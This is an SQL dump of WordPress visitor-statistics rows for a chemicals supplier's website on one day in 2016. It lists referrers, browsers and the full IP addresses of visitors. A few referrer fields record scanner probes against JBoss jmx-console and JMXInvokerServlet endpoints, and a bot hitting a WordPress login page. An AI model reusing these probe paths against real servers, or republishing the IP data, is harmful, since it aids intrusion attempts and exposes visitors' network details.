INSERT INTO `wp_statistics_visitor` VALUES (6200, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6201, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.144.207.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6202, '2016-10-19', 'https://www.google.ru/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '217.174.178.186', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6203, '2016-10-19', 'https://telegraf.by/2016/08/42/329397-ribii-jir', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6204, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.72.2.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6205, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.94.10.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6206, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.163.1', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6207, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.110.79.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6208, '2016-10-19', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '222.186.34.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6209, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.18.121.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6210, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.214.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6211, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6212, '2016-10-19', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6213, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.5.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6214, '2016-10-19', 'https://www.miller-stephenson.com/product/epon-8280/', 'Firefox', 'Windows', '45.0', '', '134.94.80.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6215, '2016-10-19', 'https://www.google.com.tw/', 'Chrome', 'Windows', '49.0.2623.112', '', '36.231.236.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6216, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.164.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6217, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.194.196.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6218, '2016-10-19', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.116', '', '81.157.40.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6219, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.148.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6220, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.246.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6221, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.138.206.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6222, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.128.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6223, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.192.169.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6224, '2016-10-19', 'https://50.62.30.35/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo', 'MSIE', 'Windows', '9.0', '', '113.204.53.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6225, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.235.188.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6226, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.199.40.30', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6227, '2016-10-19', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwibz-X_3-bPAhUDVRQKHTA9CXcQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.d24', 'MSIE', 'Windows', '11.0', '', '46.140.96.194', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6228, '2016-10-19', 'https://www.google.pl/', 'Firefox', 'Windows', '49.0', '', '91.193.121.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6229, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.117.107.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6230, '2016-10-19', '50.62.30.35/invoker/JMXInvokerServlet', 'MSIE', 'Windows', '9.0', '', '61.186.245.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6231, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Chrome', 'Android', '53.0.2785.124', '', '107.77.64.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6232, '2016-10-19', 'https://www.mahobeachcam.com/blog/wp-login.php', 'Mechanize', 'Unknown', '2.7.3', '', '23.105.184.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6233, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.230.208.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6234, '2016-10-19', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.95', '', '192.126.162.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6235, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.239.96.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6236, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.136.203.149', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6237, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '38.110.63.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6238, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.12.33.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6239, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.96.228.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6240, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.17.129.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6241, '2016-10-19', 'https://www.google.co.il/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjd-YL45ObPAhXE0hoKHc6dBQMQFghKMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=T_jAHInWdbmRIMAPBUIweA', 'MSIE', 'Windows', '11.0', '', '172.35.8.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6242, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 550, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6243, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6244, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.166.183.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6245, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6246, '2016-10-19', 'https://www.google.se/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjx6c_R6ObPAhUED5oKHdMNC3wQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-aut-2e45%2F&usg=AFQjCNHxsw5-DW4VBon0KzQBNU8o-HalPQ', 'MSIE', 'Windows', '11.0', '', '138.106.57.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6247, '2016-10-19', 'https://www.miller-stephenson.com', 'Screaming', 'Unknown', 'Unknown', '', '31.168.110.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6248, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.234.254.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6249, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '50.199.117.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6250, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.85.39.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6251, '2016-10-19', 'https://www.bing.com/search?q=miller+stephanson+++MS-482&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '149.32.192.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6252, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.174.113.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6253, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6254, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '106.6.76.225', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6255, '2016-10-19', 'https://www.google.com/afs/ads?q=Krytox%20GPL%20227%20FG&lo=true&adpage=1&gl=us&r=m&fexp=21404%2C7000107&client=ebay-us-null&channel=testchannel-02&hl=en&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=n7&ad=n7&nocache=2111476879191198&num=0&output=uds_ads_only&v=3&adext=as1%2Cl1%2Csr1&bsl=10&u_his=6&u_tz=180&dt=1476879191199&u_w=1477&u_h=831&biw=1477&bih=695&psw=1477&psh=1998&frm=0&uio=uv3cs1vp1sl1lo1sr1lhhcff2st13sd12sv12sa15ld20lv20va1af7-&jsv=51848&rurl=https%3A%2F%2Fwww.ebay.com%2Fsch%2Fi.html%3F_odkw%3DKrytox%2BGPL%2B226%2BFG%26_osacat%3D0%26_from%3DR40%26_trksid%3Dp2045573.m570.l1313.TR0.TRC0.H0.XKrytox%2BGPL%2B227%2BFG.TRS0%26_nkw%3DKrytox%2BGPL%2B227%2BFG%26_sacat%3D0&referer=https%3A%2F%2Fwww.ebay.com%2Fsch%2Fi.html%3F_odkw%3DKrytox%2BGPL%2B226%2BFG%2B0%252C8%26_osacat%3D0%26_from%3DR40%26_trksid%3Dp2045573.m570.l1313.TR0.TRC0.H0.XKrytox%2BGPL%2B226%2BFG.TRS0%26_nkw%3DKrytox%2BGPL%2B226%2BFG%26_sacat%3D0', 'Edge', 'Windows', '14.14393', '', '83.220.236.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6256, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.227.105.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6257, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjZhO_47ebPAhXDFx4KHQ4tDGsQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.dmo', 'MSIE', 'Windows', '11.0', '', '199.64.7.57', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6258, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.97.36.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6259, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6260, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '203.250.6.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6261, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.249.129.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6262, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.233.189.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6263, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '73.206.64.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6264, '2016-10-19', 'https://www.google.com/afs/ads/i/iframe.html', 'Edge', 'Windows', '14.14393', '', '104.179.108.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6265, '2016-10-19', 'https://www.google.co.uk/', 'Chrome', 'Windows', '54.0.2840.59', '', '80.85.217.221', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6266, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.93.189.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6267, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi3usnm9ObPAhVHZIYKHUwcA3QYABAA&sig=AOD64_0W1gUs8KrbAhia2EPGYmT_aVAmdA&rct=j&q=&ved=0ahUKEwiQocbm9ObPAhXCmR4KHfr5CKY4ChDRDAga&adurl=', 'MSIE', 'Windows', '11.0', '', '69.74.43.38', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6268, '2016-10-19', 'https://www.google.com.kh/', 'Chrome', 'Android', '30.0.0.0', '', '175.100.11.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6269, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6270, '2016-10-19', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6271, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6272, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.191.79.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6273, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.120.138.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6274, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.201.216.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6275, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Chrome OS', '53.0.2785.144', '', '208.108.212.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6276, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '77.75.77.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6277, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '70.210.78.217', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6278, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.104.122.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6279, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.3.20.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6280, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '140.158.49.100', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6281, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.80.144.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6282, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '5.0', '', '46.20.33.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6283, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.114.63.4', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6284, '2016-10-19', 'https://www.bing.com/search?q=miller+stephenson&qs=OS&pq=miller-step&sk=AS1&sc=8-11&sp=2&cvid=87C34E959DD74DDE947DE7E11CF4554F&FORM=QBLH&adlt=strict', 'MSIE', 'Windows', '11.0', '', '144.191.148.9', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6285, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '10.32.139.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6286, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.144.230.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6287, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '10.32.139.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6288, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '37.0.2062.120', '', '10.32.139.74', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6289, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '6.0', '', '10.32.139.74', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6290, '2016-10-19', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '134.94.80.145', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6291, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '10.32.139.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6292, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '10.32.139.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6293, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '37.0.2062.120', '', '10.32.139.68', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6294, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '6.0', '', '10.32.139.68', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6295, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '10.32.139.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6296, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '37.0.2062.120', '', '10.32.139.73', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6297, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '6.0', '', '10.32.139.73', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6298, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6299, '2016-10-19', 'https://www.bing.com/search?q=Fairfield%20county%20CT%20chemicals%20companies&qs=n&form=QBRE&pq=fairfield%20county%20ct%20chemical&sc=0-28&sp=-1&sk=&cvid=39F7C86B61BE4C53BBBEDE5C864A36F6', 'MSIE', 'Windows', '11.0', '', '206.16.224.135', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6300, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.134.71.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6301, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '12.148.189.25', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6302, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6303, '2016-10-19', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '138.201.59.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6304, '2016-10-19', 'https://app.systemepreventis.com/Section01.php?ID=6655', 'Chrome', 'Windows', '53.0.2785.143', '', '69.70.114.78', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6305, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.90.252.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6306, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6307, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6308, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwjfycnxg-fPAhWJ7IMKHWWaBVMQ_BcIfjAO&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.amc', 'MSIE', 'Windows', '11.0', '', '64.201.75.163', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6309, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '18.0', '', '5.35.25.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6310, '2016-10-19', 'https://www.google.cl/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.8.48.214', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6311, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.26.9.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6312, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.34.93.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6313, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi9vdCJh-fPAhUUWoYKHaMlCsUYABAC&ei=BYAHWM7CG8_lmQHiurvIDA&sig=AOD64_15cIWOZ8VSR-bazrxOSFajnYgEBA&ctype=4&rct=j&q=&sqi=2&ved=0ahUKEwiO2cyJh-fPAhXPciYKHWLdDskQwgUIIygB&adurl=', 'MSIE', 'Windows', '11.0', '', '50.202.145.66', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6314, '2016-10-19', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '27.251.53.59', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6315, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '4.0.4', '', '209.133.111.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6316, '2016-10-19', 'https://www.bing.com/search?q=miller+lubricants&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '12.4.27.134', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6317, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '159.63.7.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6318, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '11.0', '', '159.63.7.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6319, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.138.64.64', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6320, '2016-10-19', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiFuK-viefPAhWFYH4KHXocC-MYABAA&sig=AOD64_16XYtWeZ_ELhF5JnMP_IcWNHrwKQ&rct=j&q=&ved=0ahUKEwjYkauviefPAhUQxGMKHXOVB2EQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '208.181.4.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6321, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '80.12.39.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6322, '2016-10-19', 'https://www.motor-talk.de/forum/pflegetipps-dach-t1578134.html?page=3', 'Firefox', 'Windows', '49.0', '', '109.91.48.64', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6323, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6324, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.121.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6325, '2016-10-19', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '166.137.118.84', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6326, '2016-10-19', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '12.153.99.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6327, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.196.212.89', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6328, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Chrome OS', '53.0.2785.154', '', '98.100.203.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6329, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '141.227.1.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6330, '2016-10-19', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '70.177.0.36', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6331, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiJqqD8iufPAhVSGBsKHScjATMYABAA&sig=AOD64_2cVJszd0tRHEM-9AGfBGaJb3e3VQ&rct=j&q=&ved=0ahUKEwju4pv8iufPAhWiJJoKHT0gCoIQ0QwIOA&adurl=', 'MSIE', 'Windows', '11.0', '', '192.104.67.122', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6332, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6333, '2016-10-19', 'https://www.google.hu/', 'Firefox', 'Windows', '49.0', '', '46.107.126.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6334, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.109.42.59', '000', 2, 0); 
